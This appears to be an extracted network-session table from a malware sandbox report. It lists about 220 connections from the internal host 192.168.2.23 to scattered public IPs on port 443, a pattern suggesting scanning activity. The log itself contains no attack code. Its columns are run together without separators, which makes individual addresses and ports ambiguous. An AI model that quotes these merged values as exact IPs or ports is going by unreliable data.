                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26399192.168.2.2345634103.106.47.60443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26400192.168.2.2346172117.88.57.196443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26401192.168.2.235293059.69.0.25443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26402192.168.2.2339702181.225.163.93443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26403192.168.2.233486469.80.41.195443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26404192.168.2.234603468.198.116.109443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26405192.168.2.2344938154.14.181.227443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26406192.168.2.2348282148.24.34.89443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26407192.168.2.2336238197.117.108.198443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26408192.168.2.2356726179.204.1.255443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26409192.168.2.2333952109.49.120.228443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26410192.168.2.2346832148.201.32.125443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26411192.168.2.233775459.195.224.78443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26412192.168.2.2357368153.240.38.22443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26413192.168.2.23488724.63.79.100443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26414192.168.2.2354626145.126.207.159443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26415192.168.2.2347532134.25.239.213443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26416192.168.2.2337034207.60.228.18443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26417192.168.2.2345842155.101.76.180443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26418192.168.2.235397224.7.218.74443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26419192.168.2.235721086.96.217.229443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26420192.168.2.234640845.45.144.10443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26421192.168.2.233314874.102.58.99443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26422192.168.2.2358718176.181.49.229443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26423192.168.2.2343844172.133.197.190443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26424192.168.2.234575438.62.106.67443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26425192.168.2.2338688181.43.36.154443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26426192.168.2.235128814.156.36.14443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26427192.168.2.235557280.195.28.187443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26428192.168.2.23367762.143.126.229443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26429192.168.2.234684091.229.232.29443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26430192.168.2.2346414196.24.60.222443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26431192.168.2.2350974169.69.147.60443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26432192.168.2.2337614186.209.72.149443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26433192.168.2.2338192166.24.208.8443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26434192.168.2.234688881.156.101.251443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26435192.168.2.235339675.117.124.128443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26436192.168.2.233378232.101.61.193443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26437192.168.2.23536264.163.51.20443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26438192.168.2.2354816107.161.188.71443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26439192.168.2.2349934200.167.124.240443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26440192.168.2.2357502205.197.20.10443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26441192.168.2.233887649.252.70.219443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26442192.168.2.2333676221.94.77.46443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26443192.168.2.2344662177.177.81.71443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26444192.168.2.2332980120.98.10.158443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26445192.168.2.2349266119.221.174.162443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26446192.168.2.2341896216.35.92.30443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26447192.168.2.235499696.116.115.99443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26448192.168.2.2357418211.70.194.11443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26449192.168.2.2349838209.50.185.86443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26450192.168.2.234155213.108.235.68443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26451192.168.2.234998231.79.240.249443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26452192.168.2.234948027.235.96.137443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26453192.168.2.233549443.27.6.146443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26454192.168.2.2353092119.66.199.41443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26455192.168.2.2350126124.63.194.203443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26456192.168.2.235417635.93.180.245443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26457192.168.2.2356782158.209.13.187443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26458192.168.2.235121489.161.114.145443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26459192.168.2.2358674217.14.0.84443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26460192.168.2.234845886.73.8.83443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26461192.168.2.2355496220.210.238.199443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26462192.168.2.235246675.133.168.35443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26463192.168.2.233939450.205.122.134443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26464192.168.2.2360240136.243.174.10443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26465192.168.2.2349134206.224.48.106443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26466192.168.2.234343019.51.160.99443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26467192.168.2.234716685.129.191.174443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26468192.168.2.2348872137.27.249.75443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26469192.168.2.2359132207.244.20.74443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26470192.168.2.233961490.230.123.74443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26471192.168.2.233970842.88.197.202443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26472192.168.2.2359306167.80.219.222443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26473192.168.2.2344178137.129.52.88443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26474192.168.2.2356292219.245.46.46443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26475192.168.2.2342522191.20.211.238443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26476192.168.2.2359466156.248.192.59443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26477192.168.2.2357226205.82.71.224443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26478192.168.2.2358258126.154.7.116443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26479192.168.2.2360772178.155.49.6443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26480192.168.2.2339852162.20.89.250443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26481192.168.2.236064079.237.84.127443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26482192.168.2.235728860.232.39.210443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26483192.168.2.2336678156.75.52.111443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26484192.168.2.235871631.137.154.42443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26485192.168.2.2341250138.63.120.199443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26486192.168.2.2351282142.205.243.113443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26487192.168.2.233747618.87.245.230443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26488192.168.2.2358030176.76.240.188443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26489192.168.2.233899064.72.159.72443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26490192.168.2.2344836181.224.144.8443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26491192.168.2.235390475.107.226.108443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26492192.168.2.2348462207.206.245.14443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26493192.168.2.2342870114.135.34.192443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26494192.168.2.233529494.33.15.153443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26495192.168.2.2354760147.172.111.218443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26496192.168.2.234736832.196.103.99443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26497192.168.2.236006898.240.107.223443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26498192.168.2.2340806195.28.103.17443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26499192.168.2.2353676100.245.136.215443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26500192.168.2.2337458209.115.73.86443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26501192.168.2.236096492.240.242.150443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26502192.168.2.233580062.85.102.251443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26503192.168.2.2347788182.106.105.244443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26504192.168.2.2357044129.238.211.55443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26505192.168.2.2335064169.142.231.141443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26506192.168.2.2340096213.195.158.121443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26507192.168.2.233438677.158.47.192443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26508192.168.2.235481037.95.204.107443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26509192.168.2.2333090201.106.114.185443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26510192.168.2.235467648.209.182.214443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26511192.168.2.234806832.70.192.254443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26512192.168.2.235727069.29.98.119443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26513192.168.2.233743076.20.202.77443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26514192.168.2.2333530174.115.147.36443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26515192.168.2.2356274211.87.58.166443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26516192.168.2.2337904151.243.173.30443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26517192.168.2.2344598104.71.55.171443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26518192.168.2.236003078.91.125.156443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26519192.168.2.233608241.64.252.106443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26520192.168.2.2335662118.132.245.24443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26521192.168.2.2350728207.43.49.225443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26522192.168.2.234729247.119.23.27443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26523192.168.2.234174249.51.249.159443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26524192.168.2.2341320190.218.31.206443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26525192.168.2.235855877.164.242.27443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26526192.168.2.233565813.166.20.68443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26527192.168.2.2353206190.78.83.164443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26528192.168.2.2356348196.98.62.67443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26529192.168.2.2351360189.161.183.67443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26530192.168.2.2337990110.64.14.9443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26531192.168.2.2349836180.50.242.122443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26532192.168.2.2356080190.251.135.81443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26533192.168.2.2343518133.115.62.188443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26534192.168.2.235054878.68.91.251443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26535192.168.2.2339404208.67.50.129443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26536192.168.2.234092298.90.218.32443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26537192.168.2.2343554122.77.229.43443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26538192.168.2.234852281.3.199.179443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26539192.168.2.233419645.120.156.29443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26540192.168.2.235884820.216.213.73443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26541192.168.2.2336398117.22.53.17443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26542192.168.2.2359094188.206.160.49443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26543192.168.2.235474259.33.184.150443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26544192.168.2.235393244.178.114.58443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26545192.168.2.2341522157.47.105.182443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26546192.168.2.2342512200.49.75.110443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26547192.168.2.2360550142.107.163.197443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26548192.168.2.235455048.96.134.108443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26549192.168.2.2353302174.175.111.11443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26550192.168.2.2336278117.248.129.206443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26551192.168.2.234096013.74.196.158443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26552192.168.2.2357620106.179.0.79443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26553192.168.2.2335522108.119.187.211443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26554192.168.2.234985664.82.254.10443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26555192.168.2.234063082.171.101.50443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26556192.168.2.2350960200.47.178.60443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26557192.168.2.2344944194.31.94.26443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26558192.168.2.235919058.58.32.81443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26559192.168.2.235212287.175.127.242443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26560192.168.2.2351074171.46.89.75443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26561192.168.2.2357450208.178.40.171443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26562192.168.2.234960877.173.20.243443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26563192.168.2.2335580137.161.119.172443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26564192.168.2.2352224189.184.142.92443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26565192.168.2.2336230193.118.145.54443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26566192.168.2.2334328140.28.120.154443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26567192.168.2.2349228210.22.76.108443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26568192.168.2.233435068.151.97.72443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26569192.168.2.233538876.241.70.153443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26570192.168.2.2357562152.32.45.155443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26571192.168.2.233285452.231.51.206443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26572192.168.2.2333550198.150.171.113443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26573192.168.2.234544689.142.251.205443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26574192.168.2.2347790161.237.123.123443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26575192.168.2.2339186184.85.108.194443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26576192.168.2.233649291.73.171.85443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26577192.168.2.233551418.248.105.178443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26578192.168.2.233287889.223.60.243443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26579192.168.2.2359660189.129.254.209443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26580192.168.2.2339668213.63.65.103443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26581192.168.2.2351856161.230.179.12443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26582192.168.2.235703244.238.19.135443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26583192.168.2.2343412222.152.171.22443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26584192.168.2.2336750189.24.54.241443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26585192.168.2.2348256164.124.220.201443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26586192.168.2.235287087.50.229.6443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26587192.168.2.2341748222.237.30.116443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26588192.168.2.2336504134.46.32.165443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26589192.168.2.235763693.236.243.20443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26590192.168.2.2348196174.66.47.111443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26591192.168.2.2354924109.120.32.3443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26592192.168.2.233934466.206.111.157443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26593192.168.2.2352626115.248.131.36443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26594192.168.2.2357730165.17.178.239443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26595192.168.2.2340172107.229.118.96443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26596192.168.2.235169070.54.163.106443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26597192.168.2.235356445.106.179.62443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26598192.168.2.233690259.71.41.13443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26599192.168.2.2352218217.4.223.110443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26600192.168.2.2337338219.56.230.247443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26601192.168.2.2346176176.146.219.130443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26602192.168.2.2359034184.40.146.109443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26603192.168.2.2355234220.248.32.121443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26604192.168.2.2347850128.102.115.137443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26605192.168.2.2360568191.204.54.113443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26606192.168.2.2347022187.142.130.44443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26607192.168.2.2353774200.146.110.53443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26608192.168.2.234307459.206.48.4443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26609192.168.2.2343400134.73.14.96443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26610192.168.2.2339312152.58.191.186443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26611192.168.2.233296239.196.9.163443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26612192.168.2.2357254134.149.175.48443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26613192.168.2.2358536112.139.47.162443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26614192.168.2.2346502171.76.49.4443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26615192.168.2.2334776102.2.144.53443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26616192.168.2.234896078.95.238.123443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26617192.168.2.2355542208.96.217.246443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26618192.168.2.2344298101.67.21.39443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26619192.168.2.235319623.224.103.39443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
